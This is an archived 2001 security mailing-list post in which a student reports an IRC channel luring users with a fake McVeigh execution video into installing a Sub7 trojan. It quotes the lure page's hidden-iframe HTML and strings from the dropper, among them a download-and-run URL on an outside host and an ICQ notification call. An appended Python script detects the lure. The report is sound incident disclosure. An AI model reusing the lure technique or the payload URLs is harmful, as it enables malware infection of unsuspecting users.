Courtesy of Incidents List. Forwarded by: Adam Stanley <adamat_private>

-----Forwarded Message-----

From: Bradley Chapman <eaglebtcat_private>
To: ircat_private
Subject: Timothy McVeigh "video" link lures IRC users to install sub7

To whom it may concern:

My name is Bradley Chapman, and I am a student at Brigham Young University. Today on the EFNet IRC network, I found a channel called #mcveigh. I suspected that this channel was not set up for the best of intentions. Curious, I joined the room to see what was going on.

Almost immediately, I was assaulted with an "on-join" advertisement in the form of a channel notice. The message asked me to visit the following link to view an .AVI movie of Tim McVeigh's execution:

http://www.concentric.net/~1horizon/veigh.html

The page itself is blank. After about 2 seconds, it forwards to an email link at:

http://www.concentric.net/~1horizon/unknown.eml

This email link opens up a .tmp file, which does nothing. The web page now shows a "Connection Timed Out" message in the same web page. I was suspicious when the email hyperlink tried to send me a .TMP file. After examining that web page's HTML code, I determined it was a fake error designed to make people think that the video feed was too busy. (HTML code shown here):

====================
<HTML>
<HEAD>
</HEAD>
<body bgcolor="black" link="C0C0C0" vlink="808080" alink="FFFFFF" text="8080FF" topmargin="0"><a name="top">
<BODY bgColor=#ffffff>
<iframe src=cid:THE-CID height=0 width=0></iframe>
Connection timed out.(Busy server) Please try again later.<BR>
// [note: fake message]
</BODY>
</HTML>
========================

After using a download manager to save the email file directly, I opened it with Outlook Express. I am fully aware of the risks of opening strange emails, but I know better than to actually run the included attachments. There were two files inside - "ATT00013.txt" and "update.exe". I have thrown away the .txt file, since it was 0 bytes long.
I have packed update.exe as a ZIP file and attached it to this email. Since this was obviously an email virus, I wanted to examine it with a hex editor for useful info. Toward the end of the file, I found the following very interesting pieces of information:

==================================
%s\%s
ie.exe
home.earthlink.net
/~goldianstone/ie.exe
GET %s HTTP/1.0
Host: %s
119657247
GET /scripts/WWPMsg.dll?from=psychward&fromemail=wwwpw&subject=file+downloaded&body=%s+downloaded+and+executed&to=%s
wwp.icq.com
==================================

As you can see, this program attempts a connection with home.earthlink.net, and accesses the URL "/~goldianstone/ie.exe". I presume this file would be downloaded and executed on the victim's computer. Also interesting to note is the ICQ # there: 119657247, accompanied by the WWPMsg.dll script reference (which passes the sub7 info to the ICQ #).

I contacted the ICQ #, thinking he/she was the owner of the sub7 bots. I did make contact, but the conversation I had was not what I expected: (see attached file "treesnods.txt")

===================================
SUMMARY: She (according to her ICQ info) is getting flooded with ICQ notices from unknown addresses regarding sub7 information. I tried to get her to save the log from these notices, but she admitted she was not very computer-savvy. I tried many different ways of somehow retrieving the information (NetMeeting for supervision, WinZip to compress the 2000b folder), but to no avail. I finally gave up and told her that her ICQ log--in which she mentions a large number of sub7 messages--would be sufficient for the email to the ISPs of the offending #mcveigh channel operators.
===================================

I then re-entered #mcveigh and proceeded to tell the whole channel what the link was really about.
Not more than 15 seconds later, one of the channel operators kick-banned me with the following message:

[23:17:23] *** You were kicked from #mcveigh by low (dont be an idiot, thats what the fbi wants you to think)

I didn't care; I had all the info I needed anyway. I backscrolled through the status screen and copied the list of #mcveigh users, then did a /whois on the channel operators. Based on their hostmask, I now knew which ISPs I'd send a "nice letter." The third attached file (mcveigh.txt) is the user list and /whois results of just the channel operators. As you'll see, several of them were in these rooms together: #astral_projection, #only.hard.nigs.pimp.and.roll.here, #minnesota, and #aol.

I hope this information is helpful in stopping a potential situation, and in possibly disciplining those responsible for it. If treesnods's estimate is accurate--that is, if there are 60-70 sub7-controlled computers just 18 hours after the execution, and that growth rate continues in the aftermath of McVeigh's death--then some websites may be in trouble and should be putting up their shields.

I appreciate your time and effort spent on resolving this issue. I apologize for the length of this email, but I felt that all this info was necessary to prove a point. I look forward to hearing from each service provider.

Regards,

- Brad Chapman
Brigham Young University
801-371-4007

ISN is hosted by SecurityFocus.com
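Added here as an illustration, not part of the original post or its attachments: a small Python triage check for the lure structure described above, a blank page redirecting to an .eml whose HTML body carries a zero-size iframe that references an attached executable by cid:. The sample message is constructed to have the same shape as the one described, and the flagged extensions and field names are assumptions.

```python
import email
import re
from email import policy
from email.message import EmailMessage

# Heuristics modelled on the lure in the post: an iframe that loads a cid: part
# and is sized 0x0, plus an attachment with an executable extension (assumed list).
CID_IFRAME = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*[\"']?cid:([^\"'\s>]+)[^>]*>", re.I)
ZERO_SIZE = re.compile(r"\b(?:height|width)\s*=\s*[\"']?0\b", re.I)
EXEC_EXT = (".exe", ".scr", ".pif", ".com", ".bat", ".vbs")


def build_sample_eml() -> bytes:
    """Constructed sample (not the real unknown.eml) with the same structure."""
    msg = EmailMessage()
    msg["From"] = "someone@example.invalid"
    msg["Subject"] = "video"
    msg.set_content("Connection timed out. Please try again later.")
    msg.add_alternative(
        '<html><body><iframe src="cid:THE-CID" height=0 width=0></iframe>'
        "Connection timed out.(Busy server) Please try again later.</body></html>",
        subtype="html")
    # Placeholder bytes, not a real binary; only the filename and cid matter here.
    msg.add_attachment(b"MZ-placeholder", maintype="application",
                       subtype="octet-stream", filename="update.exe", cid="<THE-CID>")
    return msg.as_bytes()


def triage_eml(raw: bytes) -> dict:
    """Report what an analyst would want flagged before opening the message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    found = {"cid_iframes": [], "exec_attachments": [], "cid_map": {}}
    for part in msg.walk():
        cid = str(part.get("Content-ID", "")).strip("<>")
        fname = part.get_filename() or ""
        if fname.lower().endswith(EXEC_EXT):
            found["exec_attachments"].append(fname)
        if cid:
            found["cid_map"][cid] = fname or part.get_content_type()
        if part.get_content_type() == "text/html":
            for m in CID_IFRAME.finditer(part.get_content()):
                found["cid_iframes"].append(
                    {"cid": m.group(1), "hidden": bool(ZERO_SIZE.search(m.group(0)))})
    # The dangerous combination: a hidden frame pulling in an executable part.
    found["suspicious"] = any(
        f["hidden"] and found["cid_map"].get(f["cid"], "").lower().endswith(EXEC_EXT)
        for f in found["cid_iframes"])
    return found
```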
This archive was generated by hypermail 2b30 : Wed Jun 13 2001 - 00:19:41 PDT